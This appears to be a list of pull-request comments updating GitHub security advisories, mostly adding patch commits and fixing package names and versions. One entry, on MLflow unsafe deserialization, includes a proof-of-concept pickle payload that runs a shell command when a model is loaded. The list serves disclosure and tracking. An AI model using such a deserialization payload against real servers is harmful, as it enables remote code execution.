https://github.com/WordOps/WordOps/pull/645/commits/31353f0fef14ad8bc1f61c028971bd30b9e1909b
=> [GHSA-23qq-p4gq-gc2g] WordOps has TOCTOU race condition

advisories/github-reviewed/2023/06/GHSA-jv4x-j47q-6qvp/GHSA-jv4x-j47q-6qvp.json
**Updates**
**Comments**
Missing patched version. 
https://htmlcleaner.sourceforge.net/release.php
https://github.com/amplafi/htmlcleaner/issues/13#issuecomment-1597626510
=> [GHSA-jv4x-j47q-6qvp] htmlcleaner vulnerable to stack exhaustion

advisories/github-reviewed/2024/06/GHSA-3hjh-jh2h-vrg6/GHSA-3hjh-jh2h-vrg6.json
**Updates**
- Description
- Summary
**Comments**
The package should be langchain-community. No patch is available yet.
=> [GHSA-3hjh-jh2h-vrg6] Denial of service in langchain

advisories/github-reviewed/2024/06/GHSA-ghv6-9r9j-wh4j/GHSA-ghv6-9r9j-wh4j.json
**Updates**
**Comments**
Versions above 2.13.1 are affected, tested on 2.14.1.
```
$ python3 exploit.py                                                
Successfully registered model 'PyfuncPickleTest'.
Created version '1' of model 'PyfuncPickleTest'.
$ rm -rf /tmp/pwned                                       
$ python3 server.py            
$ ls /tmp/pwned                    
/tmp/pwned
$ cat exploit.py server.py   
import mlflow
class PmdarimaWrapper(mlflow.pyfunc.PythonModel):
def __init__(self):
import os
class RunCommand:
def __reduce__(self):
return (os.system, ('touch /tmp/pwned',))
self.command = RunCommand()
with mlflow.start_run():
wrapper = PmdarimaWrapper()
mlflow.pyfunc.log_model(
artifact_path="model",
python_model=wrapper, …
```
=> [GHSA-ghv6-9r9j-wh4j] MLFlow unsafe deserialization

advisories/github-reviewed/2020/06/GHSA-c265-37vj-cwcc/GHSA-c265-37vj-cwcc.json
**Updates**
- References
**Comments**
Actual code commit link, the previously existing link was only for release note update.
=> [GHSA-c265-37vj-cwcc] Deserialization of untrusted data in Jackson Databind

advisories/github-reviewed/2020/04/GHSA-758m-v56v-grj4/GHSA-758m-v56v-grj4.json
**Updates**
- References
**Comments**
Code commit link added
=> [GHSA-758m-v56v-grj4] jackson-databind mishandles the interaction between serialization gadgets and typing

advisories/github-reviewed/2021/12/GHSA-r3gr-cxrf-hg25/GHSA-r3gr-cxrf-hg25.json
**Updates**
- References
**Comments**
Code commit link added.
=> [GHSA-r3gr-cxrf-hg25] Serialization gadgets exploit in jackson-databind

advisories/github-reviewed/2023/12/GHSA-hj4r-2c9c-29h3/GHSA-hj4r-2c9c-29h3.json
**Updates**
**Comments**
The affected product (package) is github.com/elastic/beats
=> [GHSA-hj4r-2c9c-29h3] Elastic Beats inserts sensitive information into log file

advisories/github-reviewed/2024/05/GHSA-83pv-qr33-2vcf/GHSA-83pv-qr33-2vcf.json
**Updates**
**Comments**
Add Starlite (v1) fix version
=> [GHSA-83pv-qr33-2vcf] Litestar and Starlite vulnerable to Path Traversal

advisories/github-reviewed/2024/06/GHSA-qg5r-95m4-mjgj/GHSA-qg5r-95m4-mjgj.json
**Updates**
- References
**Comments**
Fix was backported to 2.0.49.x line: https://github.com/yiisoft/yii2/pull/20183
=> [GHSA-qg5r-95m4-mjgj] Reflected Cross-site Scripting in yiisoft/yii2 Debug mode

advisories/github-reviewed/2024/07/GHSA-8qgm-g2vv-vwvc/GHSA-8qgm-g2vv-vwvc.json
**Updates**
- Description
- References
**Comments**
Reflecting changes in the original security advisory:
https://github.com/railsadminteam/rails_admin/security/advisories/GHSA-8qgm-g2vv-vwvc
=> [GHSA-8qgm-g2vv-vwvc] RailsAdmin Cross-site Scripting vulnerability in the list view

advisories/github-reviewed/2024/07/GHSA-2qmw-pvf7-4mw6/GHSA-2qmw-pvf7-4mw6.json
**Updates**
**Comments**
Per https://discuss.hashicorp.com/t/hcsec-2024-14-vault-vulnerable-to-denial-of-service-when-setting-a-proxy-protocol-behavior/68518 it appears there may be a lower bound of version 1.10.0
=> [GHSA-2qmw-pvf7-4mw6] Hashicorp Vault vulnerable to Improper Check or Handling of Exceptional Conditions 

advisories/github-reviewed/2024/07/GHSA-x3r6-ccvq-cf5v/GHSA-x3r6-ccvq-cf5v.json
**Updates**
**Comments**
We (@Jayy001 and @bee-san) discovered this vulnerability. I've updated the patched version.
=> [GHSA-x3r6-ccvq-cf5v] Anki Latex Incomplete Blocklist Vulnerability

advisories/github-reviewed/2024/07/GHSA-q47p-v5rw-v574/GHSA-q47p-v5rw-v574.json
**Updates**
**Comments**
We (@Jayy001 and @bee-san) discovered this vulnerability. I've updated the patched version.
=> [GHSA-q47p-v5rw-v574] Ankitects Anki LaTeX Blocklist Bypass vulnerability

advisories/github-reviewed/2022/02/GHSA-qh36-44jv-c8xj/GHSA-qh36-44jv-c8xj.json
**Updates**
- Description
**Comments**
Per https://github.com/kubernetes/kubernetes/issues/101493#issuecomment-2272095629 -> all versions are impacted and there is no fix in place
=> [GHSA-qh36-44jv-c8xj] Potential proxy IP restriction bypass in Kubernetes

advisories/github-reviewed/2021/05/GHSA-4943-9vgg-gr5r/GHSA-4943-9vgg-gr5r.json
**Updates**
- Summary
**Comments**
Security: Cross-site Scripting in quill
=> [GHSA-4943-9vgg-gr5r] Cross-site Scripting in quill

advisories/github-reviewed/2024/04/GHSA-f82r-jj5r-6g97/GHSA-f82r-jj5r-6g97.json
**Updates**
**Comments**
patched version missing
=> [GHSA-f82r-jj5r-6g97] mlflow Path Traversal vulnerability

advisories/github-reviewed/2024/04/GHSA-j62r-wxqq-f3gf/GHSA-j62r-wxqq-f3gf.json
**Updates**
**Comments**
patched version missing, adding full info to the advisory
=> [GHSA-j62r-wxqq-f3gf] mlflow vulnerable to Path Traversal

advisories/github-reviewed/2024/08/GHSA-8hc4-vh64-cxmj/GHSA-8hc4-vh64-cxmj.json
**Updates**
- References
**Comments**
https://github.com/axios/axios/pull/6543
=> [GHSA-8hc4-vh64-cxmj] Server-Side Request Forgery in axios

advisories/github-reviewed/2022/05/GHSA-w7pm-cc4v-f3g8/GHSA-w7pm-cc4v-f3g8.json
**Updates**
**Comments**
Fix Package name to correctly represent the package.
Reference: https://mvnrepository.com/artifact/com.liferay.portal/com.liferay.portal.kernel
=> [GHSA-w7pm-cc4v-f3g8] Deserialization of Untrusted Data in Liferay Portal

advisories/github-reviewed/2024/07/GHSA-9xhh-3m78-gvgj/GHSA-9xhh-3m78-gvgj.json
**Updates**
- Description
**Comments**
Fix applied to CSLA 5 version 5.5.4
https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2
=> [GHSA-9xhh-3m78-gvgj] CLSA Directory Traversal vulnerability

advisories/github-reviewed/2024/07/GHSA-9mvj-f7w8-pvh2/GHSA-9mvj-f7w8-pvh2.json
**Updates**
**Comments**
I've added the affected artifact from https://mvnrepository.com/artifact/org.webjars.npm/bootstrap.
=> [GHSA-9mvj-f7w8-pvh2] Bootstrap Cross-Site Scripting (XSS) vulnerability

advisories/github-reviewed/2024/07/GHSA-vc8w-jr9v-vj7f/GHSA-vc8w-jr9v-vj7f.json
**Updates**
**Comments**
I've added the affected artifact from https://mvnrepository.com/artifact/org.webjars.npm/bootstrap.
=> [GHSA-vc8w-jr9v-vj7f] Bootstrap Cross-Site Scripting (XSS) vulnerability

advisories/github-reviewed/2023/02/GHSA-q3c8-65q7-9v78/GHSA-q3c8-65q7-9v78.json
**Updates**
- CVSS
**Comments**
Only admin with highest level of privileges can exploit that vulnerability. (in order to attack themselves?)
=> [GHSA-q3c8-65q7-9v78] Cross site scripting in automad/automad

advisories/github-reviewed/2023/12/GHSA-4j8w-p6hv-3qxc/GHSA-4j8w-p6hv-3qxc.json
**Updates**
**Comments**
Fixed in version 2.0.0-alpha.1
=> [GHSA-4j8w-p6hv-3qxc] Cross-Site Request Forgery (CSRF) in automad/automad

advisories/github-reviewed/2023/12/GHSA-7j9h-ch38-474r/GHSA-7j9h-ch38-474r.json
**Updates**
- CVSS
- CWEs
**Comments**
This can only be "exploited" by the main admin with the highest privilege. There is no attack vector. There is also nobody who can be harmed since aside from the admin there are no other users to steal data from. Please read the security policy for more detail.
=> [GHSA-7j9h-ch38-474r] Stored Cross-site scripting affecting automad/automad

advisories/github-reviewed/2024/05/GHSA-952p-6rrq-rcjv/GHSA-952p-6rrq-rcjv.json
**Updates**
- Description
- References
**Comments**
Hi, I'm proposing some changes to reflect the latest updates:
- The vulnerability has now been correctly fixed with release 4.0.8 so I've replaced the previous commit with the correct one
- I've also replaced the advisory reference from our DevHub platform with the one we're using now which contains more details
- I added a reference for the release notes
- Changed the description to now reflect the versions correctly
Thank you!
=> [GHSA-952p-6rrq-rcjv] Regular Expression Denial of Service (ReDoS) in micromatch

advisories/github-reviewed/2024/07/GHSA-9v2f-6vcg-3hgv/GHSA-9v2f-6vcg-3hgv.json
**Updates**
- Description
- References
**Comments**
Gradio maintainer does not believe this is a vulnerability.
https://github.com/gradio-app/gradio/issues/8853
=> [GHSA-9v2f-6vcg-3hgv] Gradio was discovered to contain a code injection vulnerability via the component /gradio/component_meta.py

advisories/github-reviewed/2024/07/GHSA-crjg-w57m-rqqf/GHSA-crjg-w57m-rqqf.json
**Updates**
- References
**Comments**
It's the same vulnerability
=> [GHSA-crjg-w57m-rqqf] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks

advisories/github-reviewed/2024/09/GHSA-jfvp-7x6p-h2pv/GHSA-jfvp-7x6p-h2pv.json
**Updates**
**Comments**
Typo in RC tag
=> [GHSA-jfvp-7x6p-h2pv] runc can be confused to create empty files/directories on the host

advisories/github-reviewed/2023/07/GHSA-353m-jh2m-72v4/GHSA-353m-jh2m-72v4.json
**Updates**
**Comments**
As per the library's own Github release for 4.5.5 that is the version that patched it
https://github.com/stanfordnlp/CoreNLP/releases/tag/v4.5.5
=> [GHSA-353m-jh2m-72v4] Code injection in stanford-parser

advisories/github-reviewed/2024/01/GHSA-j6vv-vv26-rh7c/GHSA-j6vv-vv26-rh7c.json
**Updates**
**Comments**
Correct the package name
=> [GHSA-j6vv-vv26-rh7c] HashiCorp Vault Improper Privilege Management

advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json
**Updates**
**Comments**
Correct package name
=> [GHSA-4mp7-2m29-gqxf] HashiCorp Vault Authentication bypass

advisories/github-reviewed/2022/04/GHSA-66vw-v2x9-hw75/GHSA-66vw-v2x9-hw75.json
**Updates**
**Comments**
Remove invalid package
=> [GHSA-66vw-v2x9-hw75] Podman publishes a malicious image to public registries

advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json
**Updates**
**Comments**
Correct package name
=> [GHSA-m979-w9wj-qfj9] HashiCorp Vault Improper Privilege Management

advisories/github-reviewed/2024/07/GHSA-296q-rj83-g9rq/GHSA-296q-rj83-g9rq.json
**Updates**
- CVSS v3
- Description
**Comments**
The researcher wished to not have their full name in the credits, but only initials.
=> [GHSA-296q-rj83-g9rq] Reflected Cross Site-Scripting (XSS) in Oveleon Cookiebar

advisories/github-reviewed/2023/08/GHSA-7vxc-q7rv-qfj8/GHSA-7vxc-q7rv-qfj8.json
**Updates**
- Description
**Comments**
The author responded in the original issue referenced by this: https://github.com/SUCHMOKUO/node-worker-threads-pool/issues/20
=> [GHSA-7vxc-q7rv-qfj8] SUCHMOKUO node-worker-threads-pool denial of service Vulnerability

advisories/github-reviewed/2024/08/GHSA-mg8j-w93w-xjgc/GHSA-mg8j-w93w-xjgc.json
Updated with fixed versions.
https://www.drupal.org/project/drupal/releases/10.3.6
https://www.drupal.org/project/drupal/releases/11.0.5
=> [GHSA-mg8j-w93w-xjgc] Drupal Full Path Disclosure

advisories/github-reviewed/2024/10/GHSA-qj66-m88j-hmgj/GHSA-qj66-m88j-hmgj.json
**Updates**
- CVSS v3
- Description
**Comments**
updating nuget package versions
=> [GHSA-qj66-m88j-hmgj] Microsoft Security Advisory CVE-2024-43483 | .NET Denial of Service Vulnerability

advisories/github-reviewed/2024/10/GHSA-jj78-5fmv-mv28/GHSA-jj78-5fmv-mv28.json
**Updates**
- CVSS v3
- CVSS v4
- Severity
**Comments**
I have tested the reproduction using v4.0.0-rc1 and confirmed it no longer works
=> [GHSA-jj78-5fmv-mv28] Express Open Redirect vulnerability

advisories/github-reviewed/2024/10/GHSA-f3cx-396f-7jqp/GHSA-f3cx-396f-7jqp.json
**Updates**
- CVSS v3
- CVSS v4
- Description
- References
**Comments**
Pull request comment form contributor https://github.com/livewire/livewire/pull/8624, and commit https://github.com/livewire/livewire/commit/cd168c6212ea13d13b82b3132485741f82d9fad9
=> [GHSA-f3cx-396f-7jqp] Livewire Remote Code Execution on File Uploads

advisories/github-reviewed/2020/12/GHSA-rcjj-h6gh-jf3r/GHSA-rcjj-h6gh-jf3r.json
**Updates**
**Comments**
groovy-all also contains the core groovy so every vulnerability in the core groovy is included in the groovy-all.
=> [GHSA-rcjj-h6gh-jf3r] Information Disclosure in Apache Groovy

advisories/github-reviewed/2022/05/GHSA-xphj-m9cc-8fmq/GHSA-xphj-m9cc-8fmq.json
**Updates**
**Comments**
groovy-all also contains the core groovy so every vulnerability in the core groovy is included in the groovy-all.
=> [GHSA-xphj-m9cc-8fmq] Deserialization of Untrusted Data in Groovy

advisories/github-reviewed/2024/10/GHSA-qvqv-mcxr-x8qw/GHSA-qvqv-mcxr-x8qw.json
**Updates**
- CVSS v3
- CVSS v4
- Description
- References
**Comments**
A patch is available on NPM etc but has not been published to Github releases
=> [GHSA-qvqv-mcxr-x8qw] Slim Select has potential Cross-site Scripting issue

advisories/github-reviewed/2024/03/GHSA-78hx-gp6g-7mj6/GHSA-78hx-gp6g-7mj6.json
**Updates**
**Comments**
Remove invalid package with an overlapping range
=> [GHSA-78hx-gp6g-7mj6] Memory leaks in code encrypting and verifying RSA payloads

advisories/github-reviewed/2024/04/GHSA-mxvw-cj37-8g2h/GHSA-mxvw-cj37-8g2h.json
**Updates**
**Comments**
Package was not patched after version 3.17.5. See https://github.com/aimhubio/aim/compare/v3.17.5...v3.18.1 and https://security.snyk.io/package/pip/aim/3.25.0
=> [GHSA-mxvw-cj37-8g2h] Aim Web API vulnerable to Remote Code Execution

advisories/github-reviewed/2024/07/GHSA-cj83-2ww7-mvq7/GHSA-cj83-2ww7-mvq7.json
**Updates**
- References
**Comments**
Added reference link
=> [GHSA-cj83-2ww7-mvq7] Rack ReDoS Vulnerability in HTTP Accept Headers Parsing

advisories/github-reviewed/2024/06/GHSA-cq42-vhv7-xr7p/GHSA-cq42-vhv7-xr7p.json
=> [GHSA-cq42-vhv7-xr7p] Keycloak Denial of Service via account lockout

advisories/github-reviewed/2024/10/GHSA-w8gr-xwp4-r9f7/GHSA-w8gr-xwp4-r9f7.json
=> [GHSA-w8gr-xwp4-r9f7] Vulnerable Redirect URI Validation Results in Open Redirect

advisories/github-reviewed/2021/05/GHSA-v47f-vp3p-5j6h/GHSA-v47f-vp3p-5j6h.json
Updates:
- References
Comments:
Add a patch commits:
https://github.com/zoujingli/ThinkAdmin/commit/5e7c2325008d0191f941666b5589c08a070ce838
=> [GHSA-v47f-vp3p-5j6h] Cross-site scripting in ThinkAdmin

advisories/github-reviewed/2024/05/GHSA-xqhh-253w-4q5f/GHSA-xqhh-253w-4q5f.json
Updates:
- References
Comments:
https://github.com/moodle/moodle/commit/66da9394993d97861f6c80bc4ec4ee9b513d2f33
=> [GHSA-xqhh-253w-4q5f] Moodle Cross-site Scripting (XSS)

advisories/github-reviewed/2024/05/GHSA-8qwh-4vwv-7c5m/GHSA-8qwh-4vwv-7c5m.json
Updates:
- References
Comments:
https://github.com/moodle/moodle/commit/4c966677de06bff56d46d55c419049f78e70f017
=> [GHSA-8qwh-4vwv-7c5m] Moodle Cross-site Scripting (XSS)

advisories/github-reviewed/2025/03/GHSA-mcrp-whpw-jp68/GHSA-mcrp-whpw-jp68.json
**Updates**
* References
**Comments**
* Add a patch commit https://github.com/invoke-ai/invokeai/commit/ed46acee79460189b38c164321b14bdfbf3073c9
=> Update GHSA-mcrp-whpw-jp68.json for a new patch link

advisories/github-reviewed/2025/01/GHSA-6w4x-gcx3-8p7v/GHSA-6w4x-gcx3-8p7v.json
**Updates**
* References
**Comments**
* Add a patch commit https://github.com/TYPO3-CMS/beuser/commit/18603efc3a66d3255fdd04eb6bda6b4d6a95abea
=> Update GHSA-6w4x-gcx3-8p7v.json for adding a new patch

advisories/github-reviewed/2025/01/GHSA-qcgg-j2x8-h9g8/GHSA-qcgg-j2x8-h9g8.json
**Updates**
* References
**Comments**
* Add a patch commit https://github.com/TYPO3-CMS/beuser/commit/4806731e58f3e8700a3c802e77899d54ac6021fe
* Add a patch commit https://github.com/TYPO3-CMS/beuser/commit/ad866a1ca3e7d60da888d25d27e46a8adb2ed36e
* Add a patch commit https://github.com/TYPO3-CMS/beuser/commit/18603efc3a66d3255fdd04eb6bda6b4d6a95abea
=> Update GHSA-qcgg-j2x8-h9g8.json with 3 new patch commits

advisories/github-reviewed/2025/03/GHSA-5chr-fjjv-38qv/GHSA-5chr-fjjv-38qv.json
**Updates**
* References
**Comments**
* Add a patch commit https://github.com/langchain-ai/langchain/commit/7b214ee83df911d13090fb5376bba004a934c5de for another branch
* Add a patch commit https://github.com/langchain-ai/langchain/commit/7d481f10102f43559cc57bcad7eba291067939ee for another branch
=> Update GHSA-5chr-fjjv-38qv.json with two new patches

advisories/github-reviewed/2025/01/GHSA-x88g-h956-m5xg/GHSA-x88g-h956-m5xg.json
**Updates**
* References
**Comments**
* These new patches are from other branches but for the same vulnerability
* Add a patch commit https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e
* Add a patch commit https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1
=> Update GHSA-x88g-h956-m5xg.json with two new patches

advisories/github-reviewed/2024/08/GHSA-cpfp-m5qw-c4r3/GHSA-cpfp-m5qw-c4r3.json
Updates:
- References
Comments:
https://github.com/xuxueli/xxl-job/commit/a2dc9011310628f3e18c3a5095e7e6a946d017bd
=> [GHSA-cpfp-m5qw-c4r3] Improper Preservation of Permissions in xxl-job

advisories/github-reviewed/2024/04/GHSA-2v42-xp3j-47m4/GHSA-2v42-xp3j-47m4.json
Updates:
- References
Comments:
https://github.com/xuxueli/xxl-job/commit/e3b2e1234614195390f46e26c15cd4881bd4dbe3
=> [GHSA-2v42-xp3j-47m4] Xuxueli xxl-job template injection vulnerability

advisories/github-reviewed/2022/05/GHSA-mmvj-j7hq-rx85/GHSA-mmvj-j7hq-rx85.json
**Updates**
* References
**Comments**
* These patches are all the same fix on different branches as the existing patch. They share the same commit msgs. 
* Add a patch commit https://github.com/moodle/moodle/commit/7cff64fdbfff749e779cb625fbddcce737355100 as it is another fix on another branch for the same vulnerability.
* Add a patch commit https://github.com/moodle/moodle/commit/65734f149f3c7e6cce9402f51f9a97deb31170db as it is another fix on another branch for the same vulnerability.
* Add a patch commit https://github.com/moodle/moodle/commit/d70f610615242c5c7b3ae0bf7ef6868520dcd850 as it is another fix on another branch for the same vulnerability.
* Add a patch commit https://github.com/moodle/moodle/commit/d41fa94a69bebeca69a4cd5332bb9569cfd87b99 as it is another fix on another …
=> [GHSA-mmvj-j7hq-rx85] Moodle sensitive information disclosure

advisories/github-reviewed/2025/05/GHSA-gp98-hfvm-2r4x/GHSA-gp98-hfvm-2r4x.json
Updates:
- References
Comments:
https://github.com/apache/iotdb/commit/8e61e3072ab9ee9a1bbf6c3230014111965462bf
=> [GHSA-gp98-hfvm-2r4x] Apache IoTDB JDBC Driver Discloses Sensitive Information via Log Files

advisories/github-reviewed/2025/02/GHSA-mq23-vvg7-xfm4/GHSA-mq23-vvg7-xfm4.json
Updates:
- References
Comments:
Per the v2.8.13 release notes https://github.com/rancher/rancher/releases?page=7 (“The User ID required for configuring SAML providers is now stored inside a signed JSON Web Token (JWT), ensuring it is securely protected against tampering. For more information, see CVE-2025-23389 and  [#48964](https://github.com/rancher/rancher/pull/48964).”), add pull request [#48964](https://github.com/rancher/rancher/pull/48964) and the corresponding patch commit [f36b896a99441985a1658e1b8c504d77e52fee4f](https://github.com/rancher/rancher/commit/f36b896a99441985a1658e1b8c504d77e52fee4f)
=> [GHSA-mq23-vvg7-xfm4] Rancher does not Properly Validate Account Bindings in SAML Authentication Enables User Impersonation on First Login

advisories/github-reviewed/2019/11/GHSA-pgwj-prpq-jpc2/GHSA-pgwj-prpq-jpc2.json
**Updates**
* References
**Comments**
* These patches are migrated to other branches from the existing patch commit https://github.com/symfony/symfony/commit/d2fb5893923292a1da7985f0b56960b5bb10737b. 
* Add a patch commit https://github.com/symfony/symfony/commit/4c80c3444854ef384df94deb4acbcef4b5e5243b migrated to another branch.
* Add a patch commit https://github.com/symfony/symfony/commit/3876c75f858d5d82e2c309698d21af2f1d721afb migrated to another branch.
=> [GHSA-pgwj-prpq-jpc2] Symfony Service IDs Allow Injection

advisories/github-reviewed/2024/10/GHSA-pr45-cg4x-ff4m/GHSA-pr45-cg4x-ff4m.json
=> fix: add credits section to GHSA-pr45-cg4x-ff4m.json
